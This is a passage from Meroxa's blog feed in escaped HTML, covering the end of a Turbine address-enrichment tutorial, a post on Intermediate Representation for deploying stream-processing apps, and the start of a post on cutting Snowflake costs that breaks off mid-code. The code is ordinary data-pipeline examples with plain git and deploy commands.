      	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; googleMapsLookupResponse &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;googleMapsLookup&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;customer_address&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[DEBUG] googleMapsLookupResponse ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;googleMapsLookupResponse&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;googleMapsLookupResponse&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
          console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[ERR] googleMapsLookupResponse ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;googleMapsLookupResponse&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
          &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; address_metadata &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;generateAddressObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;googleMapsLookupResponse&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[DEBUG] address_metadata ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; address_metadata&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;address_metadata&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; address_metadata&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; key &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; address_metadata&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
          record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; address_metadata&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;unwrap&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Deploying Your App&lt;/p&gt;
&lt;p&gt;Commit your changes&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Deploy your app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once your app is deployed, you will see your Snowflake DB populate with all the enriched data from the PostgreSQL table. You can also insert a record into your table to see it stream over to Snowflake in real-time!&lt;/p&gt;
&lt;p&gt;Meroxa sets up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;h2&gt;What&apos;s Next&lt;/h2&gt;
&lt;p&gt;In our next blogpost we will look at how to use Meroxa with the Twillio API &amp;#x26; Telnyx API to transform telephony data and trigger SMS events to new customers in our database. We will do phone number enrichment to validate which customers in our database have registered with a mobile phone number that is capable of receiving SMS messages and later we will trigger SMS messages to those valid numbers. Stay tuned!&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Journey to IR: How Meroxa Improved Stream Processing App Efficiencies]]></title><description><![CDATA[Learn how Meroxa used Intermediate Representation (IR) to improve stream processing application efficiencies.]]></description><link>https://meroxa.com/blog/journey-to-ir</link><guid isPermaLink="false">https://meroxa.com/blog/journey-to-ir</guid><dc:creator><![CDATA[Anna Khachaturova]]></dc:creator><pubDate>Tue, 07 Feb 2023 22:00:59 GMT</pubDate><content:encoded>&lt;p&gt;In April 2022 the Meroxa team introduced a new data application framework, Turbine. Turbine allows users to build, test and deploy data applications using one of three supported languages: &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python&quot;&gt;Python&lt;/a&gt; and &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript&quot;&gt;JavaScript&lt;/a&gt;. If you would like to read more about Turbine, please check out the following blogs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/turbine-putting-the-app-in-data-app&quot;&gt;Turbine: Putting the “App” in Data App&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa&quot;&gt;Sync, Transform, &amp;#x26; Migrate data in Real-Time from PostgreSQL to MongoDB w/ Meroxa&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;During the initial design of the Turbine framework, the team agreed upon an orchestration that would help us to evaluate if the framework was worth investing in without introducing too much complexity into our system. When the users would use commands such as “&lt;em&gt;deploy&lt;/em&gt;” and “&lt;em&gt;run&lt;/em&gt;” on their applications, the Meroxa CLI would then process the commands and make appropriate calls to each of the Turbine Language Libraries. For each of the supported languages in the Turbine framework, we developed a corresponding Turbine Language Library that would parse the application code and make separate calls to a Turbine API Client for each of the resources that needed to be created. The Turbine API Client would interact with our Meroxa Platform API to create and manage pipelines, connectors and functions. The example below shows how during application deployment, the following flow was executed across four different code components: CLI, Turbine Language Library, Turbine API Client and Meroxa Platform API.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/WKp8VdGKR0ZjhqNTfvNEhrlRlPWuZdrXmdpn0eWWerjN7SQg7Fe_Nhodi8iG_ry69yOoXy9ao87wMCfVsC1rT_ZVNh1uqT50iJBWTCck2junfVK8xSMgl83FdOqw9tdcUgf6MDwBl5IWifNPzhE6jN4&quot; alt=&quot;Diagram shows how during application deployment, the flow was executed across four different code components: CLI, Turbine Language Library, Turbine API Client and the Meroxa Platform API.&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Evaluating Challenges and Improving our Framework&lt;/h2&gt;
&lt;p&gt;With the release of our Turbine framework being a success, the team decided to redesign the orchestration to be more flexible. As each client needed separate code maintenance, we’d sometimes see deployments behave differently across each supported language. Having a separate Turbine Library and a client for each language posed a challenge for when we would need to add support for other languages. Having both CLI and Turbine API clients handle the calls to the Meroxa Platform API wasn’t ideal as it slowed our ability to test and revert changes. Making any functional changes to application deployment or Turbine logic would also require modifying each Turbine Language Library and client as well. This increased the scope of even the smallest of changes. So we sought to have a more unified place for application orchestration. In order to address these challenges, we looked for a better way to orchestrate the application deployment.&lt;/p&gt;
&lt;h2&gt;Intermediate Representation as a Solution&lt;/h2&gt;
&lt;p&gt;In order to improve the efficiency of Turbine, the team implemented Intermediate Representation, or IR. IR is a blueprint that is used to deploy a stream processing application. It maps its desired structure, defining how resources are associated with each other and what needs to be created for a stream processing application to be deployed based on the user&apos;s application definition. The IR spec is sent to Meroxa Platform API for deployment, and below, you can see an example of one.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/e5UCCj-f3lAVTVjpppBY9nKQUELDdpSAKlReUrBmUefbnBgB0QBZhTBYkCt9qPcCWfzskif8vMQtC4Eas_HrU2z2KMgte_Q8aP0lqAq1lAdKGNXyxi-PtGIHHDyCnpHO3ciH4ADvsWp2myOA8Zi3iSs&quot; alt=&quot;Code snippet: An applications IR that has a single source, function and a destination&quot;&gt;&lt;em&gt;(An applications IR that has a single source, function and a destination)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;All resource creation is now handled at the same time by using the definition from the spec. With the functions, connectors and streams of the application defined in IR, Meroxa Platform API can use the spec to first create a source connector, necessary to retrieve data from source resources. Afterwards, any functions defined in the application are created, and finally the destination connectors to transfer the data to destination resources. The Meroxa Platform API would know the flow of data by looking at streams and mapping which resource is the input or output. As we can see in the chart below, this removes steps during application deployment and simplifies the process.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/ugHH67aEK31dhb9e1JHA7hBj1F11dheoMKmdZhRYhJoxHYf7dtxwb7r6DX_iGtPXHOY9pLUeZznTwJt7B6r1AA0f_uMtOcflfBA7EZR7dZ_67qVnKNMaUgNRtOkZbkBut2VUqq6D5YxK8Yjxk2ZPiRI&quot; alt=&quot;Diagram: Shows the steps removed during application deployment and simplifies the process.&quot;&gt;&lt;/p&gt;
&lt;p&gt;For additional flexibility, we decided to go with a DAG, Direct Acyclic Graph, approach of building and mapping application resources. This allows us to detect any cycles in the application flow that would cause an infinite loop, and gives our users more versatility in designing their applications. With a DAG, we introduced a concept of “streams” that helped us map which resource connected to which in the application flow. Below we can see an example of a data application deployed with multiple destinations with the use of IR:&lt;/p&gt;
&lt;p&gt;This flexibility allows users to create data applications with the following topologies:&lt;/p&gt;
&lt;p&gt;Source → Destination&lt;/p&gt;
&lt;p&gt;Data is retrieved from a single source and sent to a destination without a function.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/1Zq6gs1ZBc60DqnpwVcfP-u6luQB5oy-b4gNzKpByQK-9E1MwQWaeZZQr-LPRk4AdAPADaSvfrNpEksKWnYB0o4XI2gGmliJOgNeaCetSSPuJkVT1D7mLwXZRrv6EslGkZawmBxDDzo4KvUH9xJBEEA&quot; alt=&quot;Diagram: Source to Destination[n]&quot;&gt;(source → destination)&lt;/p&gt;
&lt;h3&gt;Source → Destinations[n]&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source and sent to multiple destinations without a function.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/0AUkEwxE4qLjENaxH8F5Ys0GcSl3njltG23or8EdKFJFoCDN0G3FDIfhTdIEI_OMzQHDfrDZOZdSbvxIbdJs_-d0giDTkT3HGi_q5g1yJUedR8xaa3hHxJ1E4xHrGcOEZFjuXqXNeWJeWHhhxNpzeAc&quot; alt=&quot;Diagram: source to destination[n]&quot;&gt;(source → destination[n])&lt;/p&gt;
&lt;h3&gt;Source → Function&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source and sent to a function for processing.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/bMgRnQQRFCm_DkmXd84MxKlI4s_kL6364eoaDx7vAWrrIXPQsM76IR9HUMoDL6GsSY-8bg26EQ9B5R-AsV8lpcDqnXhrU_vQQiQL6HcL5brm2wKYVne7sRL5aUuq5YO2mcafcYud_V_66VxD9-ZMTRk&quot; alt=&quot;Diagram: source to function&quot;&gt;(source → function)&lt;/p&gt;
&lt;h3&gt;Source → Function → Destination&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source to be processed through a function and sent to a destination. An example of a spec with this flow can be seen in the IR spec image above.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/l0J4e0CuKGZlMCXwyOD9l1iWzKVZBRDTsXsmLGrgMZ0zNncCe8G52p1AtzpwW_uMoG7fbTlARqhaeE2iG9BlsM-IRXm4oB3LdFJvIsWxG-0DvNVHKssGWf7e75Pgm8tNeOYOPEbtiL9Rgav_a0voFsY&quot; alt=&quot;Diagram: source to function to destination[n]&quot;&gt;(source → function → destination)&lt;/p&gt;
&lt;h3&gt;Source → Function → Destinations[n]&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source to be processed through a function and sent to multiple destinations.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/Mn75vixFOMhYLihuAvex65HtGnQdr7uOWVW0qMFsK9gTFHjGWWeRmzWqfhjkAllPqJFzum7t0Mnn-auAxP4sjgsKpgEZxL7aOSqXxnrq519k8a5PSEggu8xcBgnprnfJJcf9eSZMFcC2WaMCOmJI3Ck&quot; alt=&quot;Diagram: source to function to destination[n]&quot;&gt;(source → function → destination[n])&lt;/p&gt;
&lt;h3&gt;Source → Destination[0] | Source → Function → Destination[1]&lt;/h3&gt;
&lt;p&gt;Data is retrieved from a single source and sent as is to one destination, and runs through a function for processing then sent to another destination.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/IE_3hJxmhLkecYaGhCcI8VYv8XcKoULYWFCBR3g9e6e9jkRrtFqlciK36VoRGS_bZyEQjxRKDKhrNzw76osxo3RQyiqVrznsCdNesPvcQDOMU1AtcBObIjNBedGuKRd132UGX5go_kKya8W0ZYoiIlw&quot; alt=&quot;source → destination[0] | Diagram: source to function to destination[1]&quot;&gt;(source → destination[0] | source → function → destination[1])&lt;/p&gt;
&lt;p&gt;TodayTurbine only allows a single source resource for the applications. The IR approach allows us to implement more flexibility in the future. In our IR schema, we also capture git sha, Turbine Language versioning, and any secret keys that were defined in the application that are necessary for deployment in a unified place.&lt;/p&gt;
&lt;p&gt;The use of IR in our orchestration allows for easier future feature development as well as adding support to new languages. We were able to add &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby&quot;&gt;Ruby&lt;/a&gt; as one of the new supported languages completely with IR, and the implementation went seamlessly. As one of our upcoming projects, we will be creating a unified backend for Turbine, removing the need of each Turbine Language Library, and IR is a crucial step in the design. With this new approach, we created a consistent way to deploy, debug and update data applications on Meroxa across all languages that are supported.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Optimize and Realize Value in Snowflake with Meroxa]]></title><description><![CDATA[With Meroxa, companies optimize Snowflake storage, compute, operational costs and make their developers much more productive.]]></description><link>https://meroxa.com/blog/optimizevalueinsnowflake</link><guid isPermaLink="false">https://meroxa.com/blog/optimizevalueinsnowflake</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Thu, 02 Feb 2023 18:46:35 GMT</pubDate><content:encoded>&lt;p&gt;Snowflake is a company that offers cloud-based storage options. Customers don&apos;t have to set up or maintain servers because the whole data storage service is entirely managed. While it has several benefits for consumers, including simplicity, speed, and the ability to easily share data, many criticize it’s high price due to the high volume of queries users need to make and the amount of data they need to store on Snowflake.&lt;/p&gt;
&lt;p&gt;Some companies have tried to keep their Snowflake costs down by limiting business use or making the data warehouse developers do more work to limit the number of events that get sent to Snowflake. These methods aren&apos;t always feasible, they&apos;re often time-consuming and tedious, and they only offer marginal savings.&lt;/p&gt;
&lt;p&gt;With Meroxa, companies can cut their Snowflake storage and compute costs and make their developers much more productive. Meroxa allows you to easily:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Filter data before it&apos;s ingested&lt;/li&gt;
&lt;li&gt;Denormalize data to reduce compute costs&lt;/li&gt;
&lt;li&gt;Reduce operational costs&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;What is Meroxa?&lt;/h2&gt;
&lt;p&gt;Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run their Meroxa Turbine applications. Turbine is a stream processing application framework for building event-driven stream processing apps that respond to data in real-time and scale using cloud-native best practices. Meroxa handles the underlying streaming infrastructure so that developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will take care of streaming the data into the Turbine application so that it can be run. Since Meroxa is a developer-first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-go&quot;&gt;Go&lt;/a&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js&quot;&gt;JavaScript&lt;/a&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;Python&lt;/a&gt;&lt;/strong&gt;, or &lt;a href=&quot;https://meroxa.com/blog/meroxa-now-streaming-on-ruby&quot;&gt;&lt;strong&gt;Ruby&lt;/strong&gt;&lt;/a&gt;. Support for Java, and C# is also on the way.&lt;/p&gt;
&lt;p&gt;💡 Meroxa has support for many resources to get data from and to. You can see which resources are supported &lt;a href=&quot;https://meroxa.com/integrations/&quot;&gt;here&lt;/a&gt;. If there&apos;s a resource not listed you can request it by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;. Meroxa is capable of supporting &lt;strong&gt;any&lt;/strong&gt; data resource as a connector.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;How Meroxa reduces Snowflake costs&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Filtering data before it&apos;s ingested&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Before putting data into Snowflake, unnecessary information should be filtered away to save storage and processing costs in addition to reducing the quantity of data. Data is kept in micro-partitions based on the date and time of ingestion as it is imported into Snowflake. More micro-partitions are produced as more data is loaded into Snowflake, which may result in higher storage costs. In just a few lines of code, we can use Meroxa to filter away irrelevant data before loading it into Snowflake.&lt;/p&gt;
&lt;p&gt;A simple example in Turbine (Python), where we filter the data based on &lt;code class=&quot;language-text&quot;&gt;orderDollarValue&lt;/code&gt; would look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; logging
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; sys

&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;runtime &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; RecordList
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;runtime &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Runtime

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;filter&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; RecordList&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; RecordList&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;processing &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt; record(s)&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    filtered_records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; record &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
            orderDollarValue &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; payload&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orderDollarValue&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

            &lt;span class=&quot;token comment&quot;&gt;# Keep only records where orderDollarValue &gt; 10000&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; orderDollarValue &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10000&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
                filtered_records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;append&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; Exception &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Error occurred while parsing records: &quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;output: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; filtered_records

&lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@staticmethod&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Runtime&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token comment&quot;&gt;# Load and Read Tables from any source&lt;/span&gt;
            source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;myPostgreSQL&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# MySQL, Sql Server, Kafka, Mongo etc&lt;/span&gt;
